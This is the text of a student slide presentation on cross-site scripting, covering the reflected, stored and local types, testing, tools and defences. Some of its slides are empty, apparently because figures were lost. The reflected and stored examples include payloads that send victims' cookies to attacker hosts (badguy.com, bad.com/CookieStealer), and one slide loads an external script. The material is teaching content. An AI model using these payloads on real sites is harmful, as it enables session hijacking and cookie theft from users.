Cross Site Scripting (XSS)

R.SIVA(IV CSE) Cross

Cross Site Scripting: Outline

Definition Risks Cross Site Scripting Types Testing Tools All Together Defense References

Definition
Cross Site Scripting (XSS) is a type of computer security exploit where information from one context, where it is not trusted, can be inserted into another context, where it is The trusted website is used to store, transport, or deliver malicious content to the victim The target is to trick the client browser to execute malicious scripting commands JavaScript, VBScript, ActiveX, HTML, or Flash Caused by insufficient input validation.

Cross Site Scripting Risks

XSS can : Steal cookies Hijack of users session Unauthorized access Modify content of the web page Inserting words or images Misinform Bad reputation Spy on what you do Network Mapping XSS viruses

Cross Site Scripting Types

Three known types:
Reflected (Non-Persistent)
Link in other website or email

Stored (Persistent)
Forum, bulletin board, feedback form

Local
PDF Adobe Reader , FLASH player

Reflected (Non-Persistent)
1
Send e-mail with <script> tags embedded in the link.

http://mybank.com/ account.php?variable=><script>document.lo cation=http://www.badguy.com/cgi-bin/ cookie.cgi%20+document.cookie</script>

Follows link and the script executes

2
www.badguy.com Cookie collector

Malicious content dose not get stored in the server The server bounces the original input to the victim without modification

Stored (Persistent)
Public forum web site

1
Attacker Upload malicious scripting commands to the public forum

Great message! <script> var img=new Image(); img.src= "http://www.bad.com/CookieStealer/ Form1.aspx?s= "+document.cookie; </script>

Downlaod malicious code

Victim

Browse

The server stores the malicious content The server serves the malicious content in its original form

Local
1
Attacker Send e-mail with a link Http://freeebook.com/ haha.pdf#a=javascript:alert(Boo);

Victim

2
Request for http://freeebook.com/haha.pdf Ignore everything after #

PDF Viewer gets the full URL from browser (including the content after # ) PDF Viewer executes the Javascript.

The injected script does not traverse to the server Arising fast as the major threat as the other two types of XSS are getting fixed

Cross Site Scripting Testing

Where to start?
Search box Feedback/Guestbook Application forms Look for input that can be displayed back by the site <script>alert(Boo)</script>

Dont forget to test with different encoding scheme

Base64, URL, Unicode

Cross Site Scripting Tools

N-stalker Acunetix Paros Firefox add-ons
Hackbar XSS ME

Cross Site Scripting All Together

Cross Site Scripting All Together

Cross Site Scripting All Together

Cross Site Scripting All Together

Cross Site Scripting All Together

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

Cross Site Scripting All Together

Cross Site Scripting Defense

Clint side
Disable JS Verify email Always update

Server side
Input validation (Black listing VS White listing) Encode all meta characters send to the client keep track of user sessions Web application firewall Always test

Cross Site Scripting: References

RSnake, XSS Cheat Sheet http://ha.ckers.org/xss.html XSS Attack information http://xssed.com/ OWASP Testing for XSS http://www.owasp.org/index.php/Testing_for_Cross_site_scripting Klein, A., DOM Based Cross Site Scripting http://www.webappsec.org/projects/articles/071105.shtml Acunetix web application security http://www.acunetix.com N-stalker http://www.nstalker.com How to use XSS ME http://a4apphack.com/index.php/featured/secfox-xssme-automated-xss-detection-infirefoxpart-3 SANS Web Application Security Workshop